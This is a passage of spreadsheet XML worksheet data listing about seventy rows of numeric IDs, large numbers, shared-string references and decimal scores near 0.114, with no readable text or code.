      <c r="D3805" s="2">
        <v>1.0</v>
      </c>
      <c r="E3805" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3805" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="3806" ht="15.75" customHeight="1">
      <c r="A3806" s="1">
        <v>12415.0</v>
      </c>
      <c r="B3806" s="2">
        <v>2.9118858E7</v>
      </c>
      <c r="C3806" s="2" t="s">
        <v>3602</v>
      </c>
      <c r="D3806" s="2">
        <v>1.0</v>
      </c>
      <c r="E3806" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3806" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="3807" ht="15.75" customHeight="1">
      <c r="A3807" s="1">
        <v>15782.0</v>
      </c>
      <c r="B3807" s="2">
        <v>4.4198676E7</v>
      </c>
      <c r="C3807" s="2" t="s">
        <v>3603</v>
      </c>
      <c r="D3807" s="2">
        <v>1.0</v>
      </c>
      <c r="E3807" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3807" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="3808" ht="15.75" customHeight="1">
      <c r="A3808" s="1">
        <v>19401.0</v>
      </c>
      <c r="B3808" s="2">
        <v>5.5578897E7</v>
      </c>
      <c r="C3808" s="2" t="s">
        <v>3604</v>
      </c>
      <c r="D3808" s="2">
        <v>1.0</v>
      </c>
      <c r="E3808" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3808" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="3809" ht="15.75" customHeight="1">
      <c r="A3809" s="1">
        <v>139.0</v>
      </c>
      <c r="B3809" s="2">
        <v>1.354815E7</v>
      </c>
      <c r="C3809" s="2" t="s">
        <v>3605</v>
      </c>
      <c r="D3809" s="2">
        <v>1.0</v>
      </c>
      <c r="E3809" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3809" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3810" ht="15.75" customHeight="1">
      <c r="A3810" s="1">
        <v>155.0</v>
      </c>
      <c r="B3810" s="2">
        <v>1.3689486E7</v>
      </c>
      <c r="C3810" s="2" t="s">
        <v>3606</v>
      </c>
      <c r="D3810" s="2">
        <v>1.0</v>
      </c>
      <c r="E3810" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3810" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3811" ht="15.75" customHeight="1">
      <c r="A3811" s="1">
        <v>648.0</v>
      </c>
      <c r="B3811" s="2">
        <v>1.9911759E7</v>
      </c>
      <c r="C3811" s="2" t="s">
        <v>3607</v>
      </c>
      <c r="D3811" s="2">
        <v>1.0</v>
      </c>
      <c r="E3811" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3811" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3812" ht="15.75" customHeight="1">
      <c r="A3812" s="1">
        <v>1193.0</v>
      </c>
      <c r="B3812" s="2">
        <v>2.4738492E7</v>
      </c>
      <c r="C3812" s="2" t="s">
        <v>3608</v>
      </c>
      <c r="D3812" s="2">
        <v>1.0</v>
      </c>
      <c r="E3812" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3812" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3813" ht="15.75" customHeight="1">
      <c r="A3813" s="1">
        <v>1229.0</v>
      </c>
      <c r="B3813" s="2">
        <v>2.4972131E7</v>
      </c>
      <c r="C3813" s="2" t="s">
        <v>3609</v>
      </c>
      <c r="D3813" s="2">
        <v>1.0</v>
      </c>
      <c r="E3813" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3813" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3814" ht="15.75" customHeight="1">
      <c r="A3814" s="1">
        <v>1353.0</v>
      </c>
      <c r="B3814" s="2">
        <v>2.5966383E7</v>
      </c>
      <c r="C3814" s="2" t="s">
        <v>3610</v>
      </c>
      <c r="D3814" s="2">
        <v>1.0</v>
      </c>
      <c r="E3814" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3814" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3815" ht="15.75" customHeight="1">
      <c r="A3815" s="1">
        <v>1368.0</v>
      </c>
      <c r="B3815" s="2">
        <v>2.6012138E7</v>
      </c>
      <c r="C3815" s="2" t="s">
        <v>3611</v>
      </c>
      <c r="D3815" s="2">
        <v>1.0</v>
      </c>
      <c r="E3815" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3815" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3816" ht="15.75" customHeight="1">
      <c r="A3816" s="1">
        <v>1424.0</v>
      </c>
      <c r="B3816" s="2">
        <v>2.657731E7</v>
      </c>
      <c r="C3816" s="2" t="s">
        <v>3612</v>
      </c>
      <c r="D3816" s="2">
        <v>1.0</v>
      </c>
      <c r="E3816" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3816" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3817" ht="15.75" customHeight="1">
      <c r="A3817" s="1">
        <v>1692.0</v>
      </c>
      <c r="B3817" s="2">
        <v>2.8492917E7</v>
      </c>
      <c r="C3817" s="2" t="s">
        <v>3613</v>
      </c>
      <c r="D3817" s="2">
        <v>1.0</v>
      </c>
      <c r="E3817" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3817" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3818" ht="15.75" customHeight="1">
      <c r="A3818" s="1">
        <v>1700.0</v>
      </c>
      <c r="B3818" s="2">
        <v>2.8531492E7</v>
      </c>
      <c r="C3818" s="2" t="s">
        <v>3614</v>
      </c>
      <c r="D3818" s="2">
        <v>1.0</v>
      </c>
      <c r="E3818" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3818" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3819" ht="15.75" customHeight="1">
      <c r="A3819" s="1">
        <v>2059.0</v>
      </c>
      <c r="B3819" s="2">
        <v>3.103758E7</v>
      </c>
      <c r="C3819" s="2" t="s">
        <v>3615</v>
      </c>
      <c r="D3819" s="2">
        <v>1.0</v>
      </c>
      <c r="E3819" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3819" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3820" ht="15.75" customHeight="1">
      <c r="A3820" s="1">
        <v>2247.0</v>
      </c>
      <c r="B3820" s="2">
        <v>3.2335534E7</v>
      </c>
      <c r="C3820" s="2" t="s">
        <v>3616</v>
      </c>
      <c r="D3820" s="2">
        <v>1.0</v>
      </c>
      <c r="E3820" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3820" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3821" ht="15.75" customHeight="1">
      <c r="A3821" s="1">
        <v>2450.0</v>
      </c>
      <c r="B3821" s="2">
        <v>3.3713772E7</v>
      </c>
      <c r="C3821" s="2" t="s">
        <v>3617</v>
      </c>
      <c r="D3821" s="2">
        <v>1.0</v>
      </c>
      <c r="E3821" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3821" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3822" ht="15.75" customHeight="1">
      <c r="A3822" s="1">
        <v>3108.0</v>
      </c>
      <c r="B3822" s="2">
        <v>3.6749282E7</v>
      </c>
      <c r="C3822" s="2" t="s">
        <v>3618</v>
      </c>
      <c r="D3822" s="2">
        <v>1.0</v>
      </c>
      <c r="E3822" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3822" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3823" ht="15.75" customHeight="1">
      <c r="A3823" s="1">
        <v>3216.0</v>
      </c>
      <c r="B3823" s="2">
        <v>3.7302925E7</v>
      </c>
      <c r="C3823" s="2" t="s">
        <v>3619</v>
      </c>
      <c r="D3823" s="2">
        <v>1.0</v>
      </c>
      <c r="E3823" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3823" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3824" ht="15.75" customHeight="1">
      <c r="A3824" s="1">
        <v>3848.0</v>
      </c>
      <c r="B3824" s="2">
        <v>4.0247711E7</v>
      </c>
      <c r="C3824" s="2" t="s">
        <v>3620</v>
      </c>
      <c r="D3824" s="2">
        <v>1.0</v>
      </c>
      <c r="E3824" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3824" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3825" ht="15.75" customHeight="1">
      <c r="A3825" s="1">
        <v>3969.0</v>
      </c>
      <c r="B3825" s="2">
        <v>4.0749737E7</v>
      </c>
      <c r="C3825" s="2" t="s">
        <v>3621</v>
      </c>
      <c r="D3825" s="2">
        <v>1.0</v>
      </c>
      <c r="E3825" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3825" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3826" ht="15.75" customHeight="1">
      <c r="A3826" s="1">
        <v>4087.0</v>
      </c>
      <c r="B3826" s="2">
        <v>4.1221383E7</v>
      </c>
      <c r="C3826" s="2" t="s">
        <v>3622</v>
      </c>
      <c r="D3826" s="2">
        <v>1.0</v>
      </c>
      <c r="E3826" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3826" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3827" ht="15.75" customHeight="1">
      <c r="A3827" s="1">
        <v>4098.0</v>
      </c>
      <c r="B3827" s="2">
        <v>4.1297678E7</v>
      </c>
      <c r="C3827" s="2" t="s">
        <v>3623</v>
      </c>
      <c r="D3827" s="2">
        <v>1.0</v>
      </c>
      <c r="E3827" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3827" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3828" ht="15.75" customHeight="1">
      <c r="A3828" s="1">
        <v>4175.0</v>
      </c>
      <c r="B3828" s="2">
        <v>4.1554532E7</v>
      </c>
      <c r="C3828" s="2" t="s">
        <v>3624</v>
      </c>
      <c r="D3828" s="2">
        <v>1.0</v>
      </c>
      <c r="E3828" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3828" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3829" ht="15.75" customHeight="1">
      <c r="A3829" s="1">
        <v>4271.0</v>
      </c>
      <c r="B3829" s="2">
        <v>4.18646E7</v>
      </c>
      <c r="C3829" s="2" t="s">
        <v>3625</v>
      </c>
      <c r="D3829" s="2">
        <v>1.0</v>
      </c>
      <c r="E3829" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3829" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3830" ht="15.75" customHeight="1">
      <c r="A3830" s="1">
        <v>4607.0</v>
      </c>
      <c r="B3830" s="2">
        <v>4.2865826E7</v>
      </c>
      <c r="C3830" s="2" t="s">
        <v>3626</v>
      </c>
      <c r="D3830" s="2">
        <v>1.0</v>
      </c>
      <c r="E3830" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3830" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3831" ht="15.75" customHeight="1">
      <c r="A3831" s="1">
        <v>4812.0</v>
      </c>
      <c r="B3831" s="2">
        <v>4.3563603E7</v>
      </c>
      <c r="C3831" s="2" t="s">
        <v>3627</v>
      </c>
      <c r="D3831" s="2">
        <v>1.0</v>
      </c>
      <c r="E3831" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3831" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3832" ht="15.75" customHeight="1">
      <c r="A3832" s="1">
        <v>4999.0</v>
      </c>
      <c r="B3832" s="2">
        <v>4.4177805E7</v>
      </c>
      <c r="C3832" s="2" t="s">
        <v>3628</v>
      </c>
      <c r="D3832" s="2">
        <v>1.0</v>
      </c>
      <c r="E3832" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3832" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3833" ht="15.75" customHeight="1">
      <c r="A3833" s="1">
        <v>5140.0</v>
      </c>
      <c r="B3833" s="2">
        <v>4.4644613E7</v>
      </c>
      <c r="C3833" s="2" t="s">
        <v>3629</v>
      </c>
      <c r="D3833" s="2">
        <v>1.0</v>
      </c>
      <c r="E3833" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3833" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3834" ht="15.75" customHeight="1">
      <c r="A3834" s="1">
        <v>5217.0</v>
      </c>
      <c r="B3834" s="2">
        <v>4.4967826E7</v>
      </c>
      <c r="C3834" s="2" t="s">
        <v>3630</v>
      </c>
      <c r="D3834" s="2">
        <v>1.0</v>
      </c>
      <c r="E3834" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3834" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3835" ht="15.75" customHeight="1">
      <c r="A3835" s="1">
        <v>5230.0</v>
      </c>
      <c r="B3835" s="2">
        <v>4.4994687E7</v>
      </c>
      <c r="C3835" s="2" t="s">
        <v>3631</v>
      </c>
      <c r="D3835" s="2">
        <v>1.0</v>
      </c>
      <c r="E3835" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3835" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3836" ht="15.75" customHeight="1">
      <c r="A3836" s="1">
        <v>5574.0</v>
      </c>
      <c r="B3836" s="2">
        <v>4.6043094E7</v>
      </c>
      <c r="C3836" s="2" t="s">
        <v>3632</v>
      </c>
      <c r="D3836" s="2">
        <v>1.0</v>
      </c>
      <c r="E3836" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3836" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3837" ht="15.75" customHeight="1">
      <c r="A3837" s="1">
        <v>5694.0</v>
      </c>
      <c r="B3837" s="2">
        <v>4.6475907E7</v>
      </c>
      <c r="C3837" s="2" t="s">
        <v>3633</v>
      </c>
      <c r="D3837" s="2">
        <v>1.0</v>
      </c>
      <c r="E3837" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3837" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3838" ht="15.75" customHeight="1">
      <c r="A3838" s="1">
        <v>5752.0</v>
      </c>
      <c r="B3838" s="2">
        <v>4.6650433E7</v>
      </c>
      <c r="C3838" s="2" t="s">
        <v>3634</v>
      </c>
      <c r="D3838" s="2">
        <v>1.0</v>
      </c>
      <c r="E3838" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3838" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3839" ht="15.75" customHeight="1">
      <c r="A3839" s="1">
        <v>6026.0</v>
      </c>
      <c r="B3839" s="2">
        <v>4.752406E7</v>
      </c>
      <c r="C3839" s="2" t="s">
        <v>3635</v>
      </c>
      <c r="D3839" s="2">
        <v>1.0</v>
      </c>
      <c r="E3839" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3839" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3840" ht="15.75" customHeight="1">
      <c r="A3840" s="1">
        <v>6154.0</v>
      </c>
      <c r="B3840" s="2">
        <v>4.7856943E7</v>
      </c>
      <c r="C3840" s="2" t="s">
        <v>3636</v>
      </c>
      <c r="D3840" s="2">
        <v>1.0</v>
      </c>
      <c r="E3840" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3840" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3841" ht="15.75" customHeight="1">
      <c r="A3841" s="1">
        <v>6175.0</v>
      </c>
      <c r="B3841" s="2">
        <v>4.789296E7</v>
      </c>
      <c r="C3841" s="2" t="s">
        <v>3637</v>
      </c>
      <c r="D3841" s="2">
        <v>1.0</v>
      </c>
      <c r="E3841" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3841" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3842" ht="15.75" customHeight="1">
      <c r="A3842" s="1">
        <v>6204.0</v>
      </c>
      <c r="B3842" s="2">
        <v>4.7975432E7</v>
      </c>
      <c r="C3842" s="2" t="s">
        <v>3638</v>
      </c>
      <c r="D3842" s="2">
        <v>1.0</v>
      </c>
      <c r="E3842" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3842" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3843" ht="15.75" customHeight="1">
      <c r="A3843" s="1">
        <v>6772.0</v>
      </c>
      <c r="B3843" s="2">
        <v>4.9435849E7</v>
      </c>
      <c r="C3843" s="2" t="s">
        <v>3639</v>
      </c>
      <c r="D3843" s="2">
        <v>1.0</v>
      </c>
      <c r="E3843" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3843" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3844" ht="15.75" customHeight="1">
      <c r="A3844" s="1">
        <v>6863.0</v>
      </c>
      <c r="B3844" s="2">
        <v>4.9678512E7</v>
      </c>
      <c r="C3844" s="2" t="s">
        <v>3640</v>
      </c>
      <c r="D3844" s="2">
        <v>1.0</v>
      </c>
      <c r="E3844" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3844" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3845" ht="15.75" customHeight="1">
      <c r="A3845" s="1">
        <v>7215.0</v>
      </c>
      <c r="B3845" s="2">
        <v>5.0624709E7</v>
      </c>
      <c r="C3845" s="2" t="s">
        <v>3641</v>
      </c>
      <c r="D3845" s="2">
        <v>1.0</v>
      </c>
      <c r="E3845" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3845" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3846" ht="15.75" customHeight="1">
      <c r="A3846" s="1">
        <v>7348.0</v>
      </c>
      <c r="B3846" s="2">
        <v>5.0979342E7</v>
      </c>
      <c r="C3846" s="2" t="s">
        <v>3642</v>
      </c>
      <c r="D3846" s="2">
        <v>1.0</v>
      </c>
      <c r="E3846" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3846" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3847" ht="15.75" customHeight="1">
      <c r="A3847" s="1">
        <v>7708.0</v>
      </c>
      <c r="B3847" s="2">
        <v>5.1996068E7</v>
      </c>
      <c r="C3847" s="2" t="s">
        <v>3643</v>
      </c>
      <c r="D3847" s="2">
        <v>1.0</v>
      </c>
      <c r="E3847" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3847" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3848" ht="15.75" customHeight="1">
      <c r="A3848" s="1">
        <v>7764.0</v>
      </c>
      <c r="B3848" s="2">
        <v>5.2106134E7</v>
      </c>
      <c r="C3848" s="2" t="s">
        <v>3644</v>
      </c>
      <c r="D3848" s="2">
        <v>1.0</v>
      </c>
      <c r="E3848" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3848" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3849" ht="15.75" customHeight="1">
      <c r="A3849" s="1">
        <v>7776.0</v>
      </c>
      <c r="B3849" s="2">
        <v>5.2172131E7</v>
      </c>
      <c r="C3849" s="2" t="s">
        <v>3645</v>
      </c>
      <c r="D3849" s="2">
        <v>1.0</v>
      </c>
      <c r="E3849" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3849" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3850" ht="15.75" customHeight="1">
      <c r="A3850" s="1">
        <v>7987.0</v>
      </c>
      <c r="B3850" s="2">
        <v>5.2743261E7</v>
      </c>
      <c r="C3850" s="2" t="s">
        <v>3646</v>
      </c>
      <c r="D3850" s="2">
        <v>1.0</v>
      </c>
      <c r="E3850" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3850" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3851" ht="15.75" customHeight="1">
      <c r="A3851" s="1">
        <v>8240.0</v>
      </c>
      <c r="B3851" s="2">
        <v>5.3362619E7</v>
      </c>
      <c r="C3851" s="2" t="s">
        <v>3647</v>
      </c>
      <c r="D3851" s="2">
        <v>1.0</v>
      </c>
      <c r="E3851" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3851" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3852" ht="15.75" customHeight="1">
      <c r="A3852" s="1">
        <v>8468.0</v>
      </c>
      <c r="B3852" s="2">
        <v>5.4012944E7</v>
      </c>
      <c r="C3852" s="2" t="s">
        <v>3648</v>
      </c>
      <c r="D3852" s="2">
        <v>1.0</v>
      </c>
      <c r="E3852" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3852" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3853" ht="15.75" customHeight="1">
      <c r="A3853" s="1">
        <v>8476.0</v>
      </c>
      <c r="B3853" s="2">
        <v>5.4015257E7</v>
      </c>
      <c r="C3853" s="2" t="s">
        <v>3649</v>
      </c>
      <c r="D3853" s="2">
        <v>1.0</v>
      </c>
      <c r="E3853" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3853" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3854" ht="15.75" customHeight="1">
      <c r="A3854" s="1">
        <v>8534.0</v>
      </c>
      <c r="B3854" s="2">
        <v>5.4104697E7</v>
      </c>
      <c r="C3854" s="2" t="s">
        <v>3650</v>
      </c>
      <c r="D3854" s="2">
        <v>1.0</v>
      </c>
      <c r="E3854" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3854" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3855" ht="15.75" customHeight="1">
      <c r="A3855" s="1">
        <v>8592.0</v>
      </c>
      <c r="B3855" s="2">
        <v>5.4245181E7</v>
      </c>
      <c r="C3855" s="2" t="s">
        <v>3651</v>
      </c>
      <c r="D3855" s="2">
        <v>1.0</v>
      </c>
      <c r="E3855" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3855" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3856" ht="15.75" customHeight="1">
      <c r="A3856" s="1">
        <v>8624.0</v>
      </c>
      <c r="B3856" s="2">
        <v>5.4305922E7</v>
      </c>
      <c r="C3856" s="2" t="s">
        <v>3652</v>
      </c>
      <c r="D3856" s="2">
        <v>1.0</v>
      </c>
      <c r="E3856" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3856" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3857" ht="15.75" customHeight="1">
      <c r="A3857" s="1">
        <v>8653.0</v>
      </c>
      <c r="B3857" s="2">
        <v>5.4353502E7</v>
      </c>
      <c r="C3857" s="2" t="s">
        <v>3653</v>
      </c>
      <c r="D3857" s="2">
        <v>1.0</v>
      </c>
      <c r="E3857" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3857" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3858" ht="15.75" customHeight="1">
      <c r="A3858" s="1">
        <v>8774.0</v>
      </c>
      <c r="B3858" s="2">
        <v>5.458593E7</v>
      </c>
      <c r="C3858" s="2" t="s">
        <v>3654</v>
      </c>
      <c r="D3858" s="2">
        <v>1.0</v>
      </c>
      <c r="E3858" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3858" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3859" ht="15.75" customHeight="1">
      <c r="A3859" s="1">
        <v>9158.0</v>
      </c>
      <c r="B3859" s="2">
        <v>5.5284357E7</v>
      </c>
      <c r="C3859" s="2" t="s">
        <v>3655</v>
      </c>
      <c r="D3859" s="2">
        <v>1.0</v>
      </c>
      <c r="E3859" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3859" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3860" ht="15.75" customHeight="1">
      <c r="A3860" s="1">
        <v>9232.0</v>
      </c>
      <c r="B3860" s="2">
        <v>5.5456818E7</v>
      </c>
      <c r="C3860" s="2" t="s">
        <v>3656</v>
      </c>
      <c r="D3860" s="2">
        <v>1.0</v>
      </c>
      <c r="E3860" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3860" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3861" ht="15.75" customHeight="1">
      <c r="A3861" s="1">
        <v>9430.0</v>
      </c>
      <c r="B3861" s="2">
        <v>5.5797687E7</v>
      </c>
      <c r="C3861" s="2" t="s">
        <v>3657</v>
      </c>
      <c r="D3861" s="2">
        <v>1.0</v>
      </c>
      <c r="E3861" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3861" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3862" ht="15.75" customHeight="1">
      <c r="A3862" s="1">
        <v>9816.0</v>
      </c>
      <c r="B3862" s="2">
        <v>5.6613672E7</v>
      </c>
      <c r="C3862" s="2" t="s">
        <v>3658</v>
      </c>
      <c r="D3862" s="2">
        <v>1.0</v>
      </c>
      <c r="E3862" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3862" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3863" ht="15.75" customHeight="1">
      <c r="A3863" s="1">
        <v>9940.0</v>
      </c>
      <c r="B3863" s="2">
        <v>5.6857176E7</v>
      </c>
      <c r="C3863" s="2" t="s">
        <v>3659</v>
      </c>
      <c r="D3863" s="2">
        <v>1.0</v>
      </c>
      <c r="E3863" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3863" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3864" ht="15.75" customHeight="1">
      <c r="A3864" s="1">
        <v>9960.0</v>
      </c>
      <c r="B3864" s="2">
        <v>5.6926975E7</v>
      </c>
      <c r="C3864" s="2" t="s">
        <v>3660</v>
      </c>
      <c r="D3864" s="2">
        <v>1.0</v>
      </c>
      <c r="E3864" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3864" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3865" ht="15.75" customHeight="1">
      <c r="A3865" s="1">
        <v>10223.0</v>
      </c>
      <c r="B3865" s="2">
        <v>5.7472707E7</v>
      </c>
      <c r="C3865" s="2" t="s">
        <v>3661</v>
      </c>
      <c r="D3865" s="2">
        <v>1.0</v>
      </c>
      <c r="E3865" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3865" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3866" ht="15.75" customHeight="1">
      <c r="A3866" s="1">
        <v>10318.0</v>
      </c>
      <c r="B3866" s="2">
        <v>5.7695044E7</v>
      </c>
      <c r="C3866" s="2" t="s">
        <v>3662</v>
      </c>
      <c r="D3866" s="2">
        <v>1.0</v>
      </c>
      <c r="E3866" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3866" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3867" ht="15.75" customHeight="1">
      <c r="A3867" s="1">
        <v>10333.0</v>
      </c>
      <c r="B3867" s="2">
        <v>5.7716955E7</v>
      </c>
      <c r="C3867" s="2" t="s">
        <v>3663</v>
      </c>
      <c r="D3867" s="2">
        <v>1.0</v>
      </c>
      <c r="E3867" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3867" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3868" ht="15.75" customHeight="1">
      <c r="A3868" s="1">
        <v>10336.0</v>
      </c>
      <c r="B3868" s="2">
        <v>5.771937E7</v>
      </c>
      <c r="C3868" s="2" t="s">
        <v>3664</v>
      </c>
      <c r="D3868" s="2">
        <v>1.0</v>
      </c>
      <c r="E3868" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3868" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3869" ht="15.75" customHeight="1">
      <c r="A3869" s="1">
        <v>10584.0</v>
      </c>
      <c r="B3869" s="2">
        <v>1.3194782E7</v>
      </c>
      <c r="C3869" s="2" t="s">
        <v>3665</v>
      </c>
      <c r="D3869" s="2">
        <v>1.0</v>
      </c>
      <c r="E3869" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3869" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3870" ht="15.75" customHeight="1">
      <c r="A3870" s="1">
        <v>10783.0</v>
      </c>
      <c r="B3870" s="2">
        <v>1.5664918E7</v>
      </c>
      <c r="C3870" s="2" t="s">
        <v>3666</v>
      </c>
      <c r="D3870" s="2">
        <v>1.0</v>
      </c>
      <c r="E3870" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3870" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3871" ht="15.75" customHeight="1">
      <c r="A3871" s="1">
        <v>11028.0</v>
      </c>
      <c r="B3871" s="2">
        <v>1.7886424E7</v>
      </c>
      <c r="C3871" s="2" t="s">
        <v>3667</v>
      </c>
      <c r="D3871" s="2">
        <v>1.0</v>
      </c>
      <c r="E3871" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3871" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3872" ht="15.75" customHeight="1">
      <c r="A3872" s="1">
        <v>11616.0</v>
      </c>
      <c r="B3872" s="2">
        <v>2.3061217E7</v>
      </c>
      <c r="C3872" s="2" t="s">
        <v>3668</v>
      </c>
